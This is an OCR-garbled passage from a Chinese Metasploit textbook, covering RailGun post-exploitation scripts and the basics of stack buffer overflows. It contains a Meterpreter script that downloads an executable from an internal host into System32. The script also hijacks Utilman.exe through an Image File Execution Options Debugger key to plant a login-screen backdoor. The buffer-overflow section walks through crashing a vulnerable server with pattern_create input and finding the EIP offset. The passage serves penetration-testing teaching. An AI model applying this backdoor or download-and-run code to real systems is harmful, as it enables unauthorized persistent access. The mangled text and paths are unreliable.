client.railgun.add function('urlmon','URLDownloadToFileA',' 'DWORD',[ 


"DWORD","pcaller"',"in"], 

"PCHAR","SZzURL","in"], E 
"PCHAR","szFileName","in"], 

"DWORD","Reserved","in"], 


"DWORD","lpfnCB", "in"], 
) 


将 这 段 代 码 以 urlmon.rb 为 名 保存 到 目录 /scriptMeterpreter 中 。 


这 段 代 码 给 文件 C:\WINDOWS\system32\urlmon.dll 添加 了 一 个 引用 路 径 。 这 个 文件 包含 了 访问 一 
个 URL 需要 用 到 的 所 有 功能 ， 以 及 一 些 其 他 功能 ， 比 如 下 载 某 个 特定 文件 。 我 们 将 引用 的 路 径 保 存 
在 了 名 称 urlmon 中 。 接 着 ,将 一 个 自 定义 函数 添加 到 DLL 文件 中 ， 使 用 DLL 文件 的 名 称 作 为 第 一 
个 参数 ,使 用 我 们 即将 创造 的 那个 自 定义 函数 名 作为 第 二 个 参数 ,这 个 参数 是 URLDown1loadToFileA。 
第 一 行 代码 用 来 检查 DLL 函数 是 否 已 经 在 DLL 文件 中 存在 。 如 果 已 经 存在 ， 脚 本 就 不 会 再 一 次 添加 
函数 。 如 果 调 用 的 应 用 程序 不 是 一 个 ActiveX 组 件 ， 人 参数 pcaller 将 被 设置 为 NULL; 如 果 是 一 个 
ActiveX 组 件 ， 则 将 被 设置 为 COM 对 象 。 参数 szURL 指定 了 要 下 载 的 URL。 参数 szrileName 指明 
了 从 指定 URL 下 载 的 文件 名 。 参数 Reserved 通常 被 设置 为 NULL, 而 lpfncB 用 来 处 理 下 载 的 状态 。 
然而 ， 如 果 并 不 需要 状态 值 的 话 ， 这 个 值 将 被 设置 为 NULL。 





































































































现在 创建 男 一 个 脚本 ,这 个 脚本 将 会 使 用 这 个 函数 。 我 们 要 创建 一 个 后 渗透 模块 ， 这 个 模块 的 作 
j 是 下 载 一 个 免费 的 文件 管理 器 ， 并 且 修 改 Windows 操作 系统 中 的 辅助 工具 管理 器 (utility manager ) 
的 入 口 值 。 因 此 ， 每 当 我 们 要 调用 辅助 工具 管理 器 的 时 候 ， 运 行 的 其 实 都 是 刚才 下 载 的 文件 管理 器 。 


在 相同 的 目录 下 创建 一 个 名 为 railgun-demo.rb 的 脚本 ， 内 容 如 下 。 


client.railgun.urlmon.URLDownloadToFileA(0,"http://192.168.1.10 
/A43 .exe", "C:\Windows\System32\a43 .exe",0,0) 
key="HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File 
Execution Options\Utilman.exe" 

syskey=registry_createkey (key) 

registry setvaldata(key,'Debugger','a43.exe', 'REG SZ') 

































































跟 之 前 氢 述 的 一 样 ， 脚 本 的 第 一 行 会 调用 urmon 文件 中 的 URLDownloadToFile KANKI m 
要 的 参数 。 




















接 下 来 ,在 父 键 HKLMSOFIWAREMicrosoftWindows NTCurrentVersionImage File ExcuionOptions 
而 创建 一 个 新 的 Utilman .exe Ë, 

















下 


























在 Utilman.exe 键 下面 再 建立 一 个 名 为 Debugger 的 REG. sz 类 型 的 注册 表 值 。 最 后 将 a43.exe 
赋值 给 Debugger. 

















我 们 从 Meterpreter 运行 这 个 脚本 ， 看 看 这 一 切 是 如 何 运 转 的 。 
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meterpreter > run urlmon 

[*] Adding Function 

meterpreter » getsystem 

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). 
meterpreter » run railgun demo 

meterpreter > || 














运行 脚本 railgun demo 之 后 ， 就 会 使 用 urlmon.dll 下 载 文件 管理 器 ， 并 将 这 个 文件 管理 器 放置 在 
system32 目录 中 。 接 下 来 ， 创 建 一 个 将 辅助 工具 管理 器 替换 为 a43.exe 的 注册 表 键 。 因 此 ， 当 有 人 在 
登录 屏幕 上 按 下 访问 按钮 的 时 候 ， 不 会 出 现 文件 管理 器 ， 而 是 出 现 一 个 a43 文件 管理 器 。 这 个 文件 管 
理 器 将 成 为 目标 系统 登录 屏幕 上 的 一 个 后 门 。 


好 了 ,来 看 看 在 登录 界面 中 按 下 轻松 访问 按钮 (ease of access button) 会 发 生 什 么 。 结 果 如 下 图 
所 示 。 






































dl Registry Editor 


Fle Edit View Favontes Help 


juter 
J HKEY. CLASSES ROOT 


lj. HKEY. CURRENT. USER. 
ls > GO* OOHDxX” JL HKEY LOCAL MACHINE 
Ee up 3z230"f[ |. HKEY USERS. 
下 HKEY. CURRENT. CONFIG 
Sue. Date modáed 
77372009937. 
N3009 9:3. 
41572016101 
73/008 936. 


























ERES 
[ms | 
[^ Ovewwite [ Zip Pessword | Relative Poth [ Update [ Hidder 

4 objectis) 0 objectis) selected. C 244 GB free un 











Quick Launch Text Editor | FM Extra | Find File | Folders | Hex Viewer | 
File Edit Search View JOSH d | X G3 X 8 2 0 77 | 


Une: 1 Column: 1 Insert [Unmodified 1.397248 bytes 








ie. Windows 7 Home Basic 








可 以 看 到 ， 现 在 出 现 的 是 一 个 a43 文件 管理 咒 ， 而 不 是 本 该 出 现 的 辅助 工具 管理 器 。 我 们 现在 无 
须 登 录 ， 就 可 以 实现 各 种 功能 ， 比 如 说 修改 注册 表 、 使 用 CMD 命令 行 以 及 各 种 各 样 的 操作 。 现 在 你 
见识 到 RailGun 的 威力 了 吧 , 它 可 以 帮助 你 轻松 地 访问 任何 一 个 DLL 文件 ,而 且 人 允许 你 向 其 添加 自 定 
义 的 模块 。 


有 关 此 DLL 函数 的 更 多 信息 ,请 访问 http:/msdn.microsoft.comy/en-us/library/ms775123 
(v=vs.85).aspx- 
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2.5 “小结 与 练习 


本 章 介 绍 了 Metasploit 模块 的 编写 。 我 们 了 解 了 Metasploit 的 模块 、 后 渗透 模块 脚本 、Meterpreter、 
RailGun 以 及 Ruby 程序 的 编写 。 通 过 本 章 ， 我 们 学 会 了 如 何 将 自 定义 函数 添加 到 Metasploit 框架 中 ， 
这 使 得 本 来 就 十 分 强大 的 框架 如 虎 添 痉 。 我 们 熟悉 了 Ruby 编程 语言 的 基础 知识 ， 学 习 了 辅助 模块 、 
后 渗透 模块 以 及 Meterpreter 扩展 模块 的 代码 编写 ,也 讨论 了 如 何 利 用 RailGun 的 自 定义 函数 添加 功能 ， 
例如 添加 一 个 DLL 文件 ， 或 者 向 目标 的 DLL 文件 中 添加 一 个 自 定 义 函 数 。 


为 了 进一步 提高 你 的 能 力 ， 可 以 尝试 以 下 练习 。 
口 创建 一 个 FTP 验证 暴力 模块 。 
O 针对 Windows, Linux 和 macOS 每 个 系统 至 少 开发 一 个 Metasploit 中 所 没有 的 后 渗透 模块 。 
O 通过 RailGun 调用 (除了 本 书 讲 过 的 ) 至 少 三 种 Windows DLL 功能 来 开发 自 定义 的 模块 。 
下 一 章 将 介绍 Metasploit 中 的 渗透 模块 的 开发 。 我 们 将 会 开发 一 个 自 定义 渗透 模块 ， 对 漏洞 进行 
各 种 fuzz 测试 ， 渗 透 目 标 软 件 ， 以 及 编写 针对 应 用 程序 和 Web 的 高 级 渗透 模块 。 
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本 章 将 介绍 渗透 模块 的 开发 ， 在 这 个 过 程 中 还 将 涉及 如 何 利用 Metasploit 的 内 置 功能 来 加 快 开发 的 
过 程 。 本 章 将 会 介绍 各 种 漏洞 ， 并 会 尝试 使 用 各 种 方法 和 途径 去 对 这 些 漏洞 进行 渗透 。 除 此 之 外 ,本 章 
重点 将 放 在 渗透 模块 的 开发 上 。 本 章 还 会 涵盖 各 种 用 来 辅助 Metasploit 编写 渗透 模块 的 工具 。 不 过 ， 掌 
握 计算 机 架构 是 编写 渗透 模块 的 一 个 重要 前 提 条 件 。 如 果 对 计算 机 的 架构 一 窗 不 通 , 将 无 法 理解 这 一 切 
到 底 是 如 何 运作 的 。 因 此 ， 我 们 首先 学 习 计算 机 的 架构 和 开发 渗透 模块 的 基本 要 素 。 

本 章 将 着 眼 于 以 下 几 个 要 点 。 

口 渗透 模块 开发 过 程 的 各 个 阶段 。 

口 编写 渗透 模块 时 要 使 用 的 参数 。 

O 各 种 寄存 器 的 工作 方式 。 
Q 如 何 对 软件 进行 包 zz 测试 。 

O 如 何在 Metasploit 框架 中 编写 渗透 模块 。 
口 使 用 Metasploit 绕 过 保护 机 制 的 过 程 。 


3.4 渗透 的 最 基础 部 分 


本 节 将 着 眼 于 渗透 最 重要 的 组 成 部 分 ， 同 时 也 将 就 不 同 架构 中 的 各 种 寡 存 器 进行 研究 。 我 们 将 详 
细 讨 论 指 令 指 针 寄 存 器 (extended instruction pointer, EIP ) 和 栈 指针 寄存 器 ( extended stack pointer, 
ESP ), 以 及 它们 在 渗透 模块 编写 中 的 重要 作用 。 另 外 , 空 操作 ( no operation, NOP ) 指令 和 跳 转 (jump ， 
MP ) 指令 以 及 它们 在 编写 各 种 软件 的 渗透 模块 中 的 重要 作用 ， 也 是 将 要 学 习 的 内 容 。 


3.4.1 基础 部 分 
首先 了 解 一 下 编写 渗透 模块 所 必需 的 基础 部 分 。 
下 列 术语 都 基于 硬件 特性 、 软 件 特 性 以 及 渗透 的 角度 。 


O 寄存 器 (register): 这 是 处 理 器 上 用 来 存储 信息 的 一 块 区 域 。 此 外 ， 处 理 器 利用 寄存 器 来 处 理 
进程 执行 、 内 存 操 作 、API 调 用 等 。 
口 x86: 这 是 一 个 主要 应 用 在 Intel 平 台 上 的 系统 架构 , 通常 是 32 位 操作 系统 ,而 x64 是 指 64 位 
操作 系统 。 
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口 汇编 语言 ( assembly language): 这 是 一 种 低级 编程 语言 ， 操 作 起 来 十 分 简单 。 但 是 汇编 语言 

的 阅读 或 者 维护 工作 则 是 一 块 难 哺 的 骨头 。 

C) 缓冲 区 ( buffer ): 缓冲 区 指 的 是 程序 中 用 来 存储 数据 的 一 段 国定 的 内 存 空 间 。 它 会 以 栈 或 者 堆 

的 形式 保存 数据 ， 这 取决 于 其 所 使 用 的 存储 空间 类 型 。 

O 调试 器 (debugger): 调试 器 允许 对 可 执行 文件 进行 逐步 分 析 ， 包 括 对 存储 器 、 寄 存 器 、 栈 等 
设备 的 停止 、 重 启 、 中 断 以 及 控制 等 操作 。 目 前 使 用 比较 广泛 的 调试 器 主要 有 immunity 调试 
器 、GDB 和 OllyDbg» 

O ShellCode: 这 是 一 段 用 于 在 目标 系统 上 执行 的 机 器 语言 。 过 去 ， 它 总 是 被 用 来 执行 一 个 可 以 
赋予 攻击 者 访问 目标 系统 权限 的 shell 进程 。 所 以 ，ShellCode 就 是 一 组 可 以 被 处 理 带 理解 的 
指令 。 

O 栈 (stack): 栈 充 当 着 数据 占 位 符 的 角色 ,使 用 后 进 先 出 (astin firstout, LIFO ) 的 存储 方法 ， 

也 就 是 说 最 后 进入 的 数据 会 最 先 被 移 除 。 

口 堆 (heap): 堆 是 主要 用 于 动态 分 配 的 内 存 区 域 。 与 栈 不 同 ， 我 们 可 以 在 任何 时 间 对 其 进行 分 

配 、 释 放 和 阻塞 。 

口 缓冲 区 溢出 (buffer overflow ): 这 个 概念 是 指向 缓冲 区 中 存放 了 太 多 的 数据 , 超出 了 缓冲 区 的 

范围 。 

O 格式 字符 串 错误 ( format string bug ): 这 是 在 使 用 print 系列 语句 对 文件 或 者 命令 行 中 的 文本 进 
行 处 理 时 出 现 的 一 些 错误 。 在 输入 一 组 特定 数据 的 时 候 ， 该 错误 的 存在 会 导致 程序 中 重要 信 

息 的 泄露 。 

O 系统 调用 (system call ): 程序 在 执行 的 时 候 调 用 了 操作 系统 提供 的 方法 。 


3.1.2 计算 机 架构 


计算 机 的 架构 定义 了 系统 是 如 何 由 各 个 组 成 部 分 组 织 而 成 的 。 首 先 了 解 基本 的 组 成 部 分 ， 然 后 再 
深入 学 习 高 级 部 分 。 
系统 组 织 基础 


在 开始 编写 程序 和 完成 调试 之 类 的 任务 之 前 , 首先 来 了 解 一 下 系统 的 各 个 组 成 部 分 是 如 何 组 织 在 
一 起 的 。 关 于 这 个 内 容 ， 先 来 看 下 面 这 张 图 。 






























































































































































可 以 清楚 地 看 到 ， 系 统 中 各 个 主要 部 分 都 是 通过 系统 总 线 连接 的 。 因 此 ,CPU、 内 存 和 输入 输出 
设备 之 间 的 每 一 次 通信 都 需要 通过 系统 总 线 。 








92 第 3 章 渗透 模块 的 开发 过 程 











CPU 作为 系统 的 中 央 处 理 单元 ， 是 系统 中 最 重要 的 组 成 部 分 。 可 以 根据 下 图 来 了 解 CPU 中 的 各 
个 组 成 部 分 以 及 它们 的 组 织 形式 。 











控制 单元 全 


上 图 中 显示 了 CPU 的 基本 组 成 部 分 , 例如 控制 单元 ( control unit, CU )、 执行 单元 ( execution unit, 
EU )、 寡 存 器 以 及 标志 ( flag )。 接 下 来 通过 阅读 下 表 来 了 解 一 下 各 个 部 分 的 功能 。 
































组 成 部 分 X 能 

控制 单元 主要 负责 指令 的 接收 和 译 码 工作 ， 并 将 数据 存储 到 内 存 中 
执行 单元 完成 了 真正 的 执行 过 程 

寄存 器 用 来 辅助 系统 执行 的 一 个 存储 组 件 

标志 用 来 在 系统 执行 时 标识 事件 





3.1.3 ”寄存 器 


寄存 器 是 一 种 高 速 计算 机 内 存 组 件 。 它 的 速度 是 所 有 存储 设备 中 最 快 的 。 通 常 使 用 能 同时 处 理 的 
比特 位 数 作为 寄存 器 的 衡量 标准 ， 例 如 8 位 寄存 器 和 32 位 寄存 器 能 分 别 同 时 处 理 8 位 和 32 位 的 存储 
单元 。 通 用 寄存 器 、 段 寄存 器 、 标 志 寄存 器 、 索 引 寄 存 器 都 是 系统 中 不 同类 型 的 寄存 器 。 它 们 几乎 完 
成 了 系统 全 部 的 功能 ， 因 为 在 它们 内 部 保存 了 所 有 要 处 理 的 数据 。 现 在 让 我 们 来 仔细 看 看 这 些 寄 存 器 
以 及 它们 的 作用 。 












































寄 存 器 A B 

EAX 这 是 一 个 用 来 存储 数据 和 操作 数 的 累加 器 ， 大 小 为 32 位 

EBX 这 是 一 个 基地 址 寄存 器 ， 同 时 也 是 一 个 指向 数据 的 指针 ， 大 小 为 32 位 

ECX 这 是 一 个 以 实现 循环 为 目的 的 计数 器 ， 大 小 为 32 位 

EDX 这 是 一 个 用 来 保存 IO 指针 的 数据 寄存 器 ， 大 小 为 32 位 

ESI/EDI 两 者 都 是 索引 寄存 器 ， 用 作 内 存 运 算 时 的 数据 指针 ， 大 小 为 32 位 

ESP 这 个 寄存 器 中 保存 了 栈 顶 的 位 置 ， 每 当 有 元 素 进 栈 或 出 栈 的 时 候 ，ESP 的 值 都 会 发 生 
改变 ， 大 小 为 32 位 

EBP 这 是 一 个 栈 数据 指针 寄存 器 ， 大 小 为 32 位 

EIP 这 是 指令 指针 ， 大 小 为 32 位 ， 是 本 章 中 最 重要 的 一 个 指针 。 它 保存 了 要 执行 的 下 一 指 
令 的 地 址 


SS、DS、ES、CS、FS 和 GS ”这 些 都 是 段 寄 存 器 ， 大 小 为 16 位 


有 关 架 构 的 基本 知识 以 及 用 于 渗透 模块 的 各 种 系统 调用 和 指令 的 更 多 信息 ， 请 访问 


http://resources.infosecinstitute.comy/debugging-fundamentals-for-exploit-development/#x86。 
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3.2 ”使 用 Metasploit 实现 对 栈 的 缓冲 区 溢出 


缓冲 区 游 出 是 程序 执行 中 的 一 个 异常 ， 即 向 缓冲 区 中 写 和 数据 时 ， 这 些 数据 超出 了 缓冲 区 的 大 小 

















并 且 覆 盖 了 内 存 地 址 。 下 图 给 出 了 一 个 非常 简单 的 缓冲 区 溢出 漏洞 。 
0x00000000 0x00000000 
ESP; ATES 
保存 变量 的 空间 
Ce EBP; PRH 
保存 EIP l 
程序 无 法 找到 
下 一 条 指令 的 
地 址 
OxFFFFFFFF OxFFFFFFFF 




















上 图 的 左 半 部 分 显示 了 一 个 程序 的 结构 , 右 半 部 分 则 显示 了 当 满足 缓冲 区 溢出 条 件 时 程序 的 表现 。 


但 是 如 何 才能 利用 这 个 缓冲 区 溢出 漏洞 呢 ? 答案 其 实 很 简单 。 如 果 我 们 知道 了 用 来 保存 EP 的 起 
始 地 址 前 面 的 数据 长 度 ， 那么 就 可 以 将 任意 数据 保存 到 原来 EIP 的 位 置 ， 从 而 控制 所 要 执行 的 下 一 条 
指令 的 地 址 。 


因此 ,我 们 要 做 的 第 一 件 事情 就 是 确定 覆盖 EIP 前 面 的 所 有 数据 所 需要 的 准确 字 节 数量 。 在 接 下 
来 的 内 容 中 ,我 们 将 看 到 如 何 使 用 Metasploit 来 确定 这 个 数量 。 


3.2.1 使 一 个 有 漏洞 的 程序 3 BH 
首先 下 载 一 个 使 用 了 有 漏洞 的 函数 编写 的 程序 。 先 在 命令 行 中 运行 这 个 程序 。 
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~ C:\WINDOWS\system32\cmd.exe - bof-server.exe 200 





icrosoft Windows XP [Version 5.1.26081 a 
<C) Copyright 1985-2881 Microsoft Corp. 


:NDocuments and SettingsMfldministrator?cd Desktop 


:NDocuments and SettingsMfüidministratorNDesktop?bof-seruer.exe 200 
[19281 192.168.180.104 connected 


£l 


可 以 看 到 ， 这 个 小 程序 在 200 端口 上 提供 TCP 服务 。 向 这 个 200 端口 执行 TELNET 连接 ， 然 后 
提供 随机 数据 ， 这 个 过 程 如 下 图 所 示 。 


画 Telnet 192.168.10.104 l-le x 


> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 二 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, 













































































提供 了 这 些 数据 之 后 ， 与 目标 的 连接 便 断 开 了 ， 这 是 因为 目标 应 用 服务 器 已 经 骨 溃 。 来 看 一 下 在 
目标 服务 器 上 发 生 了 什么 。 


bof-server.exe 


bof-server.exe has encountered a problem and needs to 
close. We are sorry for the inconvenience. 


If you were in the middle of something, the information you were working on 
might be lost. 
Please tell Microsoft about this problem. 


We have created an error report that you can send to us. We will treat 
this report as confidential and anonymous. 


To see what data this error report contains, click here. 


Send Error Report 
通过 单 击 click here 就 可 以 获得 一 份 错误 报告 ， 下 面 给 出 了 具体 的 信息 。 

















bof-server.exe 


Error signature. 


AppName: bof-server.exe Apper: 0000 — ModName: unknown 
Modver 0.0.0.0 — Offset 41414141 





Reporting details 


This error report includes: information regarding the condition of bof-server.exe when the problem 
occurred; the operating system version and computer hardware in use; your Digital Product ID, which 
could be used to identify your license; and the Internet Protocol (IP) address of your computer. 


We do not intentionally collect your files, name, address, email address or any other form of personally 
identifiable information. However, the error report could contain customer-specific information such as 
data from open files. While this information could potentially be used to determine your identity, if 
present, it will not be used. 


The data that we collect will only be used to fix the problem. If more information is available, we will tell 
you when you report the problem. This error report will be sent using a secure connection to a database 
with limited access and will not be used for marketing purposes. 


To view technical information about the error report, click here. 
To see our data collection policy on the web, click here. Close 
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程序 无 法 在 地 址 41414141 处 找到 下 一 条 要 执行 的 指令 ， 从 而 导致 了 程序 朋 溃 。 这 里 面 能 找到 一 
些 蛛 丝 马 迹 吗 ? 值 41 是 字符 A 的 16 进 制 表 示 , A 也 正 是 我 们 输入 的 字符 , 它们 超出 了 缓冲 区 的 范围 ， 
接着 覆盖 了 EIP 寄存 器 。 由 于 下 一 条 指令 的 地 址 被 重 写 ， 程 序 就 试图 按照 这 个 41414141 地 址 去 寻找 
下 一 条 要 执行 的 指令 ， 但 这 显然 不 是 一 个 有 效 的 地 址 ， 所 以 程序 崩溃 了 。 









































CD 从 以 下 网 址 可 以 下 载 上 面 示例 中 使 用 的 程序 : http;/redstack.net/blog/category/How962 
To.html。 





3.2.2. ”构建 渗透 模块 的 基础 


为 了 实现 对 目标 应 用 的 渗透 并 获取 目标 系统 的 权限 ， 需 要 获取 下 表 中 列 出 的 信息 。 


" 容 m 途 

偏 移 量 (offset) 我 们 在 上 一 节 中 让 应 用 程序 崩溃 了 。 为 了 渗透 这 个 应 用 程序 , 需要 确定 填 满 缓冲 区 和 
EBP 寄存 器 所 需 字 节 的 准确 长 度 , 在 这 个 长 度 后 面 的 内 容 就 会 被 保存 到 EIP 寄 存 器 中 。 
我 们 将 未 填充 进 EIP 寄 存 器 的 数据 长 度 称 为 偏 移 量 

跳 转 地 址 (jump address/ret) ”用 来 重 写 EIP 寄 存 器 的 一 个 地 址 ， 通 常 是 一 个 DLL 文 件 的 JMP ESP 指 令 ， 可 以 让 程序 
跳 转 到 攻击 载荷 所 在 的 地 址 

坏 字符 (bad character) 坏 字符 指 的 是 那些 可 能 导致 放 击 载 疹 终止 的 字符 。 假设 一 个 ShellCode 中 存在 null 字 节 
(0x00) , 那么 它 在 网 络 传输 的 过 程 中 就 可 能 导致 缓冲 过 早 的 结束 , 从 而 出 现 意 想不到 
的 结果 。 应 尽量 避免 坏 字符 


下 图 分 步 又 解释 了 渗透 过 程 。 
























































Buffer EBP EIP 


JMP ESP 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Addr 





1. 计算 用 来 覆盖 缓冲 区 和 EBP 所 需 的 字 节 3. 用 于 去 除 不 确定 因素 的 填充 数据 和 
Jeu 











对 照 上 图 ， 必 须 完成 以 下 步 又 。 

(1) 使 用 用 户 输入 填充 EIP 寄存 器 起 始 地 址 之 前 的 缓冲 区 和 EBP 寄存 器 。 
(2) 使 用 JMP ESP 的 地 址 来 改写 EIP。 

G) 在 攻击 载荷 之 前 提供 一 些 填充 数据 。 

(4) 删除 攻击 载荷 本 身 的 坏 字 节 。 


下 面 将 详细 地 介绍 这 些 步 又 。 
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3.2.3 ”计算 偏 移 量 
正如 上 一 节 所 介绍 的 , 开发 渗透 模块 的 第 一 个 步 又 就 是 找 出 偏 移 量 。 在 这 个 过 程 中 将 使 用 Metasploit 


的 两 款 工具 ， 分 别 是 pa 








ttern create 和 pattern offset, 


1. f& FH pattern create 工具 


在 上 一 节 中 , 我 们 


H 


pi: 























过 输入 大 量 的 字符 A 导致 了 目标 程序 的 骨 溃 。 不 过 现在 既然 在 研究 如 何 构建 





一 个 可 以 工作 的 渗透 模块 ， 那 么 就 必须 找 出 导致 程序 骨 溃 的 具体 字符 数量 。Metasploit 内 置 的 




















pattern creat 


E 





具 可 以 完成 这 一 工作 一 一 它 产生 了 可 以 代替 字符 A 进行 填充 的 字符 序列 ,基于 这 











个 序列 就 可 以 改写 EIP 寄存 器 中 的 值 。 通 过 使 用 对 应 的 工具 pattern offset 可 以 找 出 准确 的 字 节 
数量 。 下 图 给 出 了 具体 的 操作 。 

















root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern create.rb 1000 
Aa0AalAa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0AclAc2Ac3Ac4Ac5Ac6 
Ac7Ac8Ac9Ad0AdiAd2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0AelAe2Ae3Ae4Ae5Ae6Ae7Ae8Ae9AfOAf1Af2Af3 
Af4AAf5Af6GAf7AfB8Af9Ag0AglAg2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0 
Ai1Ai2Ai3Ai4Ai15Ai6Ai7A18Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0AklAk2Ak3AkA4AK5Ak6Ak7 
Ak8Ak9A10A11A12A13A14A15A16A17A18A19AmOAmlAm2Am3Am4Am5Am6Am7AmB8Am9AnOAnlAn2An3An4 
An5An6An7An8An9A00A01A02A03A04A05A06AO07AO8AO9ApOAplAp2Ap3ApA4Ap5Ap6Ap7Ap8Ap9Aq0Aq1 
AAq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9ArÜ0ArlAr2Ar3Ar4Ar5Ar6Ar7Ar8Ar9AS0AS1AS2AS3AS4AAS5AS6AS7AS8 
AS9AtOAtlAt2At3At4At5At6At7At8At9AuOAulAu2Au3Au4Au5Au6Au7Au8Au9AvOAvlAv2Av3AvAAv5 
Av6Av7AvB8Av9AwOAw1Aw2Aw3AwAAw5Aw6Aw7AWB8AW9AxOAxlAx2Ax3AxAAx5AXx6Ax7Ax8Ax9AyOAylAy2 
AyS3Ay4Ay5Ay6Ay7Ay8Ay9AzOAZlAz2Az3AzAAz5Az6Az7Az8Az9Ba0BalBa2Ba3Ba4Ba5Ba6Ba7Ba8Ba9 
BbOBb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9BcOBcC1BcC2Bc3BcABc5Bc6Bc7BcC8Bc9BdOBdlBd2Bd3Bd4Bd5Bd6 
Bd7Bd8Bd9Be0BelBe2Be3Be4Be5Be6Be7Be8Be9BfOBflBf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9BgOBglBg2Bg3 
Bg4Bg5Bg6Bg7Bg8Bg9BhOBh1Bh2B 











使 用 /tools/exploit/ 目 录 下 面 的 pattern. create.rb 脚本 生成 一 个 1000 字 节 的 字符 序列 , 结果 如 上 图 所 
示 。 这 个 输出 的 序列 可 以 当 作 参数 输入 到 有 漏洞 的 应 用 程序 中 ， 如 下 图 所 示 。 





























E Telnet 192.168.10.104 








> hagha1ha2ha3ha4ha5sha6ha7hasha9hbgnhb1hb2hb3hb4hb5shb6hb7hb8hb9hcghc1hc2hc3hc4hc5s| 了 了 
Ac6hc7hc8hc9h8d9nd18d2hd3hd4hd5hd6hd7hd8hd9hegnhe1he2he3he4he5he6he7he8he9hfORf16f 
2hf3hf4hfShRf6hf7hRfShf9h890h891892h893h94h95h96h9g7h98hg9hhonh1hh2hh3hh4hh5hh6hh7hh8h 
h9Ai0Ai1Ai2Ai3Ai4AiSAiGAi7Ai8Ai9AjOAj1Aj2Aj3Aj4AjSAj6Aj?AjSAjIAkKOAk1Ak2Ak 3AkK4AKS 
hk6hkr7hk8hk9810811812613h614h815Sh16h817h818819hmonhm1hm2hm3hm4hm5hm6hm7hmShm9hnonn1hn 
2hn3hn4hn5hn6hn7hn8hn9hogho1ho2ho3ho4ho5ho6horho8ho9hp9np168p26p3hp4hpShP6hPp7hp8h 
p93Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9AreAr1Ar2Ar3Ar4ArSAreAr?7Ar8Ar9AsoAs1As2As3As4As5 
hs6hs7hs8hs9htonht1ht2ht3ht4htSht6ht7htSht9hu9hu1hu2hu3hu4hu5hu6hu7hu8hu9hu0hu1hu 
2AVZAVYAVSAVGAU TAVZAVIAWOAWT AWZAWZAWHAWSAWGAWTAWSAWIAXOAXIAXZAXZAXYAXSAXGAXTAXZA 
XIAyYOAYIAYZAYZAY4AYSAYGAYTAYSAYIAZOAZI AZ2AZZAZ4AZ5SAZGAZTAZ8AZIBa0BalBa2Ba3Ba4Ba5 
Ba6Ba7Ba8Ba9Bb9Bb1Bb2Bb3Bb4BbSsBb6Bb7Bb8Bb9Bco9Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd9Bd1Bd 
2Bd3Bd4BdS5Bd6Bd7Bd8Bd9BegBe1Be2Be3Be4Be5Be6Be7Be8Be9Bf9Bf1Bf2Bf3Bf4BfS5Bf6Bf7Bf8B 
f9B90B91B92B93B94B95B96B97B98B99BhOBh1 Bh2B m 























从 目标 服务 所 在 的 终端 上 可 以 看 到 偏 移 量 ， 下 面 给 出 了 该 程序 的 截图 。 
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bof-server.exe 





Error signature. 


AppName: bof-server.exe AppVer 0.0.0.0 — ModName: unknown 
ModVer. 0000 Offset: 72413372 


Reporting details — — — — — — — — — — — 
This error report includes: information regarding the condition of bof-server.exe when the problem 
occurred; the operating system version and computer hardware in use; your Digital Product ID, which 
could be used to identify your license; and the Intemet Protocol (IP) address of your computer. 


We do not intentionally collect your files, name, address, email address or any other form of personally 
identifiable information. However, the error report could contain customer-specific information such as 
data from open files. While this information could potentially be used to determine your identity, if 
present, it will not be used. 


The data that we collect will only be used to fix the problem. If more information is available, we will tell 
you when you report the problem. This error report will be sent using a secure connection to a database 
with limited access and will not be used for marketing purposes. 





To view technical information about the error report, click here. 


| To see our data collection policy on the web, click here. 




















我 们 发 现 是 72413372 TH s f EIP 寄存 器 的 地 址 。 

2. 使 用 pattern offset 工具 

在 上 一 节 中 ,我 们 已 经 得 知 用 来 改写 EIP 内 容 的 地 址 为 72413372。 接 下 来 ， 使 用 pattern. 
offset 工具 来 计算 改写 EIP 所 需 的 确切 字 节 数量 。 这 个 工具 需要 两 个 参数 ， 第 一 个 是 地 址 ， 第 二 个 
